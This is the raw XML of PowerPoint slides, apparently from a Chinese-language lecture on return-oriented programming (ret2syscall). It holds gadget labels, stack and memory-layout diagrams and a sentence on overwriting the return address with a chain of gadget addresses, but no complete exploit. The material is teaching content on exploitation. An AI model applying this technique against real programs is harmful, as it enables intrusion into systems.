            <a:endParaRPr sz="1867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668" name="Shape 1668"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="2304667"/>
            <a:ext cx="2095200" cy="7636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0x080788c1</a:t>
            </a:r>
            <a:endParaRPr sz="1867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669" name="Shape 1669"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="4778933"/>
            <a:ext cx="3581200" cy="4096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pop %edx; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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670" name="Shape 1670"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="3224200"/>
            <a:ext cx="3581200" cy="4096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xor %eax, %eax; ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867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671" name="Shape 1671"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="2481651"/>
            <a:ext cx="3581200" cy="4096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" sz="1867" kern="0" dirty="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mov %eax, (%edx); ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="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672" name="Shape 1672"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7162473" y="1341000"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1673" name="Shape 1673"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8059740" y="1545800"/>
            <a:ext cx="537600" cy="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674" name="Shape 1674"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744967" y="5563900"/>
            <a:ext cx="3581200" cy="4096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stack overflow; ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1675" name="Shape 1675"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1674" idx="0"/>
            <a:endCxn id="1669" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="5188700"/>
            <a:ext cx="0" cy="3752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76" name="Shape 1676"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1669" idx="0"/>
            <a:endCxn id="1670" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="3633733"/>
            <a:ext cx="0" cy="11452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77" name="Shape 1677"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1670" idx="0"/>
            <a:endCxn id="1671" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4535567" y="2891400"/>
            <a:ext cx="0" cy="3328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78" name="Shape 1678"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1665" idx="1"/>
            <a:endCxn id="1669" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="4983717"/>
            <a:ext cx="2271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1679" name="Shape 1679"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1667" idx="1"/>
            <a:endCxn id="1670" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="3428917"/>
            <a:ext cx="2271200" cy="276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1680" name="Shape 1680"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1668" idx="1"/>
            <a:endCxn id="1671" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6326133" y="2686467"/>
            <a:ext cx="2271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dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1681" name="Shape 1681"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="4001567"/>
            <a:ext cx="2165200" cy="4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%edx = value</a:t>
            </a:r>
            <a:endParaRPr sz="1867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682" name="Shape 1682"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="2852900"/>
            <a:ext cx="2165200" cy="4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%eax = 0</a:t>
            </a:r>
            <a:endParaRPr sz="1867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683" name="Shape 1683"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775833" y="1900133"/>
            <a:ext cx="3050000" cy="4096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*(int *)value = 0</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1684" name="Shape 1684"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207373" y="2104927"/>
            <a:ext cx="537600" cy="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685" name="Shape 1685"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310107" y="1900127"/>
            <a:ext cx="848800" cy="4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EIP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686" name="Shape 1686"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597333" y="1534600"/>
            <a:ext cx="2095200" cy="7636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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867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687" name="Shape 1687"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2849733" y="1900133"/>
            <a:ext cx="3050000" cy="4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0x41414141</a:t>
            </a:r>
            <a:endParaRPr sz="1867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D278550D-848D-45BC-BEB4-45E8FD53970C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 1589">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B214AF52-0E71-4BCF-ABCE-8A6160771637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="299153" y="890764"/>
            <a:ext cx="8298180" cy="763588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ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>(Return Oriented Programming)</a:t>
            </a:r>
            <a:endParaRPr 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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6649319" y="581081"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr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7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1162336"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="396313"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="2093056"/>
                <a:ext cx="1363200" cy="325549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zh-CN" dirty="0" err="1"/>
                  <a:t>Libc</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2418605"/>
                <a:ext cx="1363200" cy="475492"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1605876"/>
              <a:ext cx="5738969" cy="490143"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10888324" y="1295909"/>
            <a:ext cx="858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Stack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9" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6649322" y="1538342"/>
            <a:ext cx="5" cy="4450368"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649325" y="4517002"/>
            <a:ext cx="3883021" cy="28005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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649321" y="5415762"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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7" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649320" y="5678933"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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8" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6649321" y="5920495"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10532341" y="5483977"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6174715" y="5483977"/>
            <a:ext cx="474606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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6174706" y="5483977"/>
            <a:ext cx="9" cy="262161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箭头连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6174706" y="5746138"/>
            <a:ext cx="474614" cy="1010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文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10888324" y="5536852"/>
            <a:ext cx="858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Text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D1FFE461-B8E4-4C17-A1A3-67FF7C4A0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193067" y="2769256"/>
            <a:ext cx="33660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篡改栈帧上自返回地址开始的一段区域为一系列 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gadget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的地址，最终调用目标系统调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="连接符: 肘形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{477981EA-3FE8-461E-A6E5-DCAFADB62AAE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8081575" y="3292548"/>
            <a:ext cx="4949875" cy="11"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 76"/>
              <a:gd name="adj2" fmla="val 2147483646"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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矩形 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDFD6823-6E38-485F-9740-4B2AEF44C443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2syscall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239004538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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6649319" y="581081"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
